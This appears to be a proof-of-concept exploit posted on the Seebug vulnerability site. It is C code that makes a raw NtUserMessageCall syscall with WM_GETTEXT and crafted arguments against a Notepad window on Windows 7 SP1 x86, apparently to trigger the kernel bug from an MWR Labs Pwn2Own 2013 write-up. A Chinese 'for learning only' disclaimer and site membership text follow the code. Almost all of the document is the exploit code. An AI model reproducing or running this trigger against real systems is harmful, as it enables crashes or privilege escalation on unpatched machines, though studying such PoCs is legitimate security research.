/* more detials: https://labs.mwrinfosecurity.com/blog/2013/09/06/mwr-labs-pwn2own-2013-write-up-kernel-exploit/ this poc is written by 0xBigBan */ #include <windows.h> #define __NtUserMessageCall 0x11ea //on win7 sp1 x86 void SystemCall(DWORD ApiNumber, ...) { __asm{ lea edx, [ebp+0x0c] mov eax, ApiNumber int 0x2e leave ret } } int main() { //you should have open a txt file with notepad HWND handle = FindWindow(NULL,"a.txt - notepad"); void* ptr = malloc(sizeof(int)*2); SystemCall(__NtUserMessageCall, handle, WM_GETTEXT, 0x8, //buffer size ptr, //user mode buffer 0x0, 0x2b3, 0x2); //ASCII boolean/flag }
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论